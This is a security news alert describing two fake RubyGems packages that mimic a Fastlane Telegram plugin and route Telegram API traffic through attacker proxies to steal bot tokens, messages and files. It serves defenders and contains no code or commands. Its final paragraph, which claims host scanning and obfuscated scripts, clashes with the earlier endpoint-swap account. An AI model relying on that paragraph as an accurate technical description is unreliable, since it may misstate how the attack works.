Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Alerts

Fake RubyGems Steal Telegram Bot Tokens

June 4, 2025
Reading Time: 2 mins read
in Alerts
Crocodilus Trojan Steals Crypto Globally

Cybersecurity researchers have recently uncovered two malicious RubyGems packages that are currently posing as popular Fastlane CI/CD plugins. These deceptive packages are specifically designed to redirect legitimate Telegram API requests to various attacker-controlled servers for extensive data interception. RubyGems serves as the official package manager for the Ruby programming language, widely used for distributing and managing essential software libraries. The malicious packages actively intercept highly sensitive data, including unique chat IDs, detailed message content, any attached files, and even vital bot tokens. Socket researchers discovered this ongoing supply chain attack, promptly warning the entire Ruby developer community about the significant inherent risk.

Fastlane is a legitimate open-source automation tool extensively utilized by many mobile application developers for various critical software development tasks.

The legitimate ‘fastlane-plugin-telegram’ notably allows Fastlane to send important notifications over Telegram by using a specially configured Telegram bot. The malicious gems that were discovered by Socket researchers are nearly identical in appearance to this legitimate and trusted plugin. The crucial difference, however, involves swapping the legitimate Telegram API endpoint with the attacker’s specific proxy-controlled endpoint for illicit data interception.

This subtle but critical change ensures that sensitive information, such as valuable bot tokens and private messages, is surreptitiously intercepted by attackers.

The specific data actively stolen by these malicious RubyGems includes the valuable Telegram bot token, the actual message data itself, and any files uploaded. If any proxy credentials are configured by the unsuspecting user, these too are unfortunately compromised during this insidious attack process. The attacker thereby gains ample opportunity for further exploitation and achieves long-term persistence because Telegram bot tokens typically remain valid until manually revoked. Deceptively, the gems’ landing pages falsely claim the proxy does not store or modify any bot tokens, but Socket notes this cannot be verified. Cloudflare Worker scripts used by these attackers are not publicly visible, allowing threat actors to log or alter any data.

This incident clearly highlights a sophisticated supply chain attack where hackers upload tainted RubyGems to the official repository, cleverly masquerading as useful tools. Once installed by a developer, these malicious packages then silently scan the host system for Telegram API tokens and exfiltrate them. The attack’s notable technical sophistication lies in its use of obfuscated Ruby scripts and also encrypted communication channels, making detection very challenging. Developers who have inadvertently installed these malicious gems should remove them immediately, rebuild any mobile binaries, and importantly rotate all compromised bot tokens. Experts also strongly suggest blocking network traffic to ‘*.workers[.]dev’ unless it is explicitly needed for legitimate daily operations.

Reference:

  • Fake Fastlane Plugins On RubyGems Steal Telegram Bot Tokens And Messages
Tags: Cyber AlertsCyber Alerts 2025CyberattackCybersecurityJune 2025
ADVERTISEMENT

Related Posts

Fake Firms Push Malware on Crypto Users

Fake Sites Push Investment Scams

July 11, 2025
Fake Firms Push Malware on Crypto Users

Severe WordPress Flaw 200K Sites at Risk

July 11, 2025
Fake Firms Push Malware on Crypto Users

Fake Firms Push Malware on Crypto Users

July 11, 2025
Hackers Revive SEO Poisoning

Hackers Revive SEO Poisoning

July 10, 2025
Hackers Revive SEO Poisoning

RondoDox Botnet Exploits Router Flaws

July 10, 2025
Hackers Revive SEO Poisoning

ServiceNow Data Exposure via ACLs

July 10, 2025

Latest Alerts

Fake Sites Push Investment Scams

Fake Firms Push Malware on Crypto Users

Severe WordPress Flaw 200K Sites at Risk

RondoDox Botnet Exploits Router Flaws

ServiceNow Data Exposure via ACLs

Hackers Revive SEO Poisoning

Subscribe to our newsletter

    Latest Incidents

    Microsoft’s Outlook Long Outage

    Avantic Lab Affected By Ransomware

    $40M+ Stolen from GMX Crypto Platform

    Bitcoin Depot Breach Exposes Data

    McDonald’s AI Hiring Bot Exposes Data

    Nippon Steel Solutions Data Breach

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial